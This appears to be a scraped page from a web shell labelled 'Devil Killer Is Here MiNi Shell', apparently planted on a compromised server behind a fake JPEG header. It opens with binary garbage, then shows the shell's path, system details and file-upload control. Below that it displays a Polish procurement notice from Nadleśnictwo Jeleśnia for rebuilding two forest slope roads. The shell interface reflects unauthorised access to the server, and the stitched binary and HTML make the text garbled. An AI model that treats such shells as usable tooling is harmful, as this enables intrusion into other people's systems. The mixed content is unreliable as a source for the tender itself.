JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211021/0023983601-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dwóch dróg stokowych w Nadleśnictwie Jeleśnia </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Leśne LP Nadleśnictwo Jeleśnia</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 071001955</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Suska 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jeleśnia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-340</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+ 48 33 8636 131</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">jelesnia@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://jelesnia.katowice.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dwóch dróg stokowych w Nadleśnictwie Jeleśnia </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-453e01cd-31d1-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00239836</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00066973/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa drogi stokowej w leśnictwie Korbielów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://josephine.proebiz.com/pl/tender/15225/summary <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W zakresie składania ofert Platforma zakupowa JOSEPHINA pod adresem: https://www.josephine.proebiz.com/pl/<br/><br/>2. W zakresie komunikacji z Wykonawcami:<br/>poczta elektroniczna: jelesnia@katowice.lasy.gov.pl<br/><br/>3. Adres strony internetowej: https://josephine.proebiz.com/pl/tender/15225/summary</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między zamawiającym a wykonawcami odbywa się wyłącznie przy użyciu środków komunikacji elektronicznej zgodnie z art. 61 Prawa zamówień publicznych, za pośrednictwem<br/>elektronicznej Platformy zakupowej JOSEPHINA (dalej: „Platforma JOSEPHINA”) pod adresem:<br/>https://www.josephine.proebiz.com/pl/ oraz poczty elektronicznej, z zastrzeżeniem że złożenie oferty<br/>następuje wyłącznie przy użyciu Platformy JOSEPHINA.<br/><br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie JOSEPHINA. Zarejestrowanie i utrzymywanie konta na Platformie<br/>JOSEPHINA oraz korzystanie z Platformy JOSEPHINA jest bezpłatne. Zarejestrowany Wykonawca ma dostęp do formularza: Nowa oferta / Wniosek.<br/><br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji dla Wykonawcy korzystania z Platformy JOSEPHINE, stanowiącym załącznik nr 8 do SWZ.<br/><br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/><br/>5. Za datę przekazania oferty przyjmuje się datę jej przekazania na Platformie JOSEPHINA.<br/><br/>6. Za datę przekazania wniosków,zawiadomień, dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów w postaci papierowej (elektronicznych kopii dokumentów<br/>stworzonych w postaci papierowej) oraz innych informacji przyjmuje się datę ich przekazania na adres<br/>poczty elektronicznej Zamawiającego: jelesnia@katowice.lasy.gov.pl<br/><br/>7. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania i wycofania<br/>ofert):<br/>1) Komunikacja pomiędzy Zamawiającym a Wykonawcami, w tym w szczególności składanie<br/>oświadczeń, wniosków, zawiadomień oraz<br/>przekazywanie informacji odbywa się elektronicznie za pośrednictwem poczty elektronicznej e-mail:<br/>jelesnia@katowice.lasy.gov.pl, z zastrzeżeniem, że złożenie oferty następuje wyłącznie za pośrednictwem Platformy JOSEPHINA.<br/>We wszelkiej korespondencji Zamawiający i Wykonawcy posługują się numerem postępowania<br/>wskazanym w SWZ.<br/>2) Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów w postaci<br/>papierowej (elektroniczne kopie dokumentów utworzonych w postaci papierowej) składane są przez<br/>Wykonawcę za pośrednictwem poczty elektronicznej, na wskazany w ppkt 1) adres email: jelesnia@katowice.lasy.gov.pl<br/><br/>8. Sposób sporządzenia i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej musi być zgody z wymaganiami określonymi w Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U.<br/>z 2020 r. poz. 2452).<br/><br/>9. Wykonawca zobowiązany jest w składanym Formularzu Oferty (załącznik nr 3 do SWZ) podać adres email, na którym prowadzona będzie korespondencja związana z postępowaniem.<br/><br/>10. Wykonawca zobowiązany jest do powiadomienia Zamawiającego o wszelkiej zmianie adresu poczty elektronicznej podanego w ofercie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">270.9.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 – Przebudowa drogi stokowej nr inw. 220/522 w leśnictwie Korbielów.<br/><br/>1)	Przedmiotem zamówienia są roboty budowlane polegające na przebudowie odcinka istniejącej drogi stokowej o nawierzchni tłuczniowej o długości 1 000 m.<br/>2)	Odcinek drogi przeznaczonej do przebudowy zlokalizowany jest na terenie działki nr 220/522 w miejscowości Korbielów, gmina Jeleśnia, na terenie leśnictwa Korbielów w Nadleśnictwie Jeleśnia. W/w działka stanowi własność Skarbu Państwa.<br/><br/>3)	Roboty budowlane obejmują:<br/>a)	przebudowę nawierzchni drogi, w tym:<br/>-	Przybranie skarpy pod drogę wraz z podkuciami <br/>-	Profilowanie i dogęszczenie podłoża wraz z demontażem wodospustów <br/>-	Ułożenie geowłókniny polipropylenowej <br/>-	Wykonanie warstwy podbudowy - kruszywo łamane 20 cm <br/>-	Wykonanie nawierzchni z kamienia łamanego 15 cm <br/>-	Ukształtowanie poboczy z tłucznia szer 50 cm jednostronne <br/>b)	przebudowę 3 składów drewna, mijanki oraz pętli do nawracania, w tym:<br/>-	Niwelację terenu,<br/>-	Formowanie nasypów, <br/>-	Ułożenie geowłókniny polipropylenowej <br/>-	Wykonanie warstwy podbudowy - kruszywo łamane 30 cm <br/>-	Wykonanie nawierzchni z kamienia łamanego 10 cm <br/>c)	poprawę odwodnienia, w tym: <br/>-	Wykonanie cieku z buku na całej długości z kamienia łamanego gr 25cm na podbudowie betonowej gr 10cm wraz z wykonaniem spoinowania <br/>-	Montaż wodospustów drewnianych dł. 5,00m szt. 20 <br/>-	Wykonanie przepustu poprzecznego Ø60 cm HDPE dł. 6,00 m wraz ze studnia wlotową z kamienia na zaprawie i skrzydłami wylotowymi w km 0+020 <br/>-	Wykonanie przepustu poprzecznego Ø60 cm HDPE dł. 6,00 m wraz ze studnia wlotową z kamienia na zaprawie i skrzydłami wylotowymi w km 0+050 <br/>-	Wykonanie przepustu poprzecznego Ø60 cm HDPE dł. 6,00 m wraz ze studnia wlotową z kamienia na zaprawie i skrzydłami wylotowymi w km 0+140 <br/>-	Wykonanie przepustu poprzecznego Ø60 cm HDPE dł. 6,00 m wraz ze studnia wlotową z kamienia na zaprawie i skrzydłami wylotowymi w km 0+250 <br/>-	Wykonanie przepustu poprzecznego Ø60 cm HDPE dł. 6,00 m wraz ze studnia wlotową z kamienia na zaprawie i skrzydłami wylotowymi w km 0+350 <br/>-	Wykonanie przepustu poprzecznego Ø60 cm HDPE dł. 6,00 m wraz ze studnia wlotową z kamienia na zaprawie i skrzydłami wylotowymi w km 0+450 <br/>-	Wykonanie przepustu poprzecznego Ø60 cm HDPE dł. 6,00 m wraz ze studnia wlotową z kamienia na zaprawie i skrzydłami wylotowymi w km 0+650 <br/>-	Wykonanie przepustu poprzecznego Ø60 cm HDPE dł. 8,00 m wraz ze studnia wlotową z kamienia na zaprawie i skrzydłami wylotowymi w km 0+697 <br/>-	Wykonanie przepustu poprzecznego Ø60 cm HDPE dł. 6,00 m wraz ze studnia wlotową z kamienia na zaprawie i skrzydłami wylotowymi w km 0+770 <br/>-	Wykonanie przepustu poprzecznego Ø60 cm HDPE dł. 8,00 m wraz ze studnia wlotową z kamienia na zaprawie i skrzydłami wylotowymi w km 0+897 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45262000-1 - Specjalne roboty budowlane inne niż dachowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybiera ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ, tj. a) Cena oferty<br/>b) Samodzielna realizacja kluczowych elementów zamówienia<br/>c) Przedłożenie okresu gwarancji .<br/><br/>2. Punktacja w ramach kryteriów będzie przeliczana z dokładnością dwóch miejsc po przecinku,<br/>zgodnie z matematycznymi zasadami zaokrągleń.<br/><br/>3. Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą liczbę punktów<br/>wyliczoną jako sumę punktów uzyskanych w kryteriach.<br/><br/>4. Maksymalna łączna liczba punktów jaką może uzyskać oferta wynosi – 100 pkt.<br/><br/>5. Kryteria oceny ofert w niniejszym postępowaniu stanowią:<br/>a) Cena (C) –waga 60 %,<br/>b) Samodzielna realizacja kluczowych elementów zamówienia. (Kluczowe elementy zamówienia obejmują roboty budowlane polegające na wykonaniu nawierzchni drogi wraz z podbudową) - waga 20%.<br/>c) Przedłożenie okresu gwarancji ponad 36 miesięcy - waga 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Samodzielna realizacja kluczowych elementów zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 – Przebudowa drogi stokowej nr inw. 220/253 w leśnictwie Romanka Górna<br/><br/>1)	Przedmiotem zamówienia są roboty budowlane polegające na przebudowie odcinka istniejącej drogi stokowej o nawierzchni tłuczniowej o długości 834 m.<br/><br/>2)	Odcinek drogi przeznaczonej do przebudowy zlokalizowany jest na terenie działki nr 220/253 w miejscowości Sopotnia Mała, gmina Jeleśnia, na terenie leśnictwa Romanka Górna w Nadleśnictwie Jeleśnia. W/w działka stanowi własność Skarbu Państwa.<br/><br/>3)	Roboty budowlane obejmują:<br/>a)	przebudowę nawierzchni drogi, w tym:<br/>-	Korektę muldy wraz z podkuciami <br/>-	Profilowanie i dogęszczenie podłoża <br/>-	Ułożenie geowłókniny polipropylenowej <br/>-	Wykonanie warstwy podbudowy - kruszywo łamane 20 cm <br/>-	Wykonanie nawierzchni z kamienia łamanego 15 cm <br/>-	Ukształtowanie poboczy z tłucznia szer 50cm jednostronne <br/>b)	przebudowę 2 składów drewna, i 2 mijanek, w tym:<br/>-	Niwelację terenu,<br/>-	Formowanie nasypów, <br/>-	Ułożenie geowłókniny polipropylenowej <br/>-	Wykonanie warstwy podbudowy - kruszywo łamane 30 cm <br/>-	Wykonanie nawierzchni z kamienia łamanego 10 cm <br/>c)	poprawę odwodnienia, w tym: <br/>-	Czyszczenie i profilowanie dna istniejącego rowu <br/>-	Montaż wodospustów drewnianych dł. 5,00 m szt. 12 <br/>-	Wykonanie przepustu poprzecznego Ø60 cm HDPE dł. 8,00 m wraz ze studnia wlotową z kamienia na zaprawie i skrzydłami wylotowymi w km 0+317 <br/>-	Wykonanie przepustu poprzecznego Ø60 cm HDPE dł. 8,00m wraz ze studnia wlotową z kamienia na zaprawie i skrzydłami wylotowymi w km 0+598 <br/>-	Wykonanie przepustu poprzecznego Ø60 cm HDPE dł. 6,00m wraz ze studnia wlotową z kamienia na zaprawie i skrzydłami wylotowymi w km 0+721 <br/>-	Wykonanie przepustu poprzecznego Ø60 cm HDPE dł. 8,00m wraz ze studnia wlotową z kamienia na zaprawie i skrzydłami wylotowymi w km 0+834 <br/>-	Wykonanie przepustu podłużnego Ø50 cm VIPRO dł. 8,00 m w km 0+350 <br/>-	Wykonanie przepustu podłużnego Ø60 cm HDPE /odzysk/ dł. 6,00 m w km 0+826<br/>-	Wykonanie brodu 0+289 z kamienia łamanego gr 25 cm na podbudowie betonowej 10 cm </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45240000-1 - Budowa obiektów inżynierii wodnej</p> <p class="mb-0">45262000-1 - Specjalne roboty budowlane inne niż dachowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybiera ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ, tj. a) Cena oferty<br/>b) Samodzielna realizacja kluczowych elementów zamówienia<br/>c) Przedłożenie okresu gwarancji .<br/><br/>2. Punktacja w ramach kryteriów będzie przeliczana z dokładnością dwóch miejsc po przecinku,<br/>zgodnie z matematycznymi zasadami zaokrągleń.<br/><br/>3. Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą liczbę punktów<br/>wyliczoną jako sumę punktów uzyskanych w kryteriach.<br/><br/>4. Maksymalna łączna liczba punktów jaką może uzyskać oferta wynosi – 100 pkt.<br/><br/>5. Kryteria oceny ofert w niniejszym postępowaniu stanowią:<br/>a) Cena (C) –waga 60 %,<br/>b) Samodzielna realizacja kluczowych elementów zamówienia. (Kluczowe elementy zamówienia obejmują roboty budowlane polegające na wykonaniu nawierzchni drogi wraz z podbudową) - waga 20%.<br/>c) Przedłożenie okresu gwarancji ponad 36 miesięcy - waga 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Samodzielna realizacja kluczowych elementów zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie okresu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 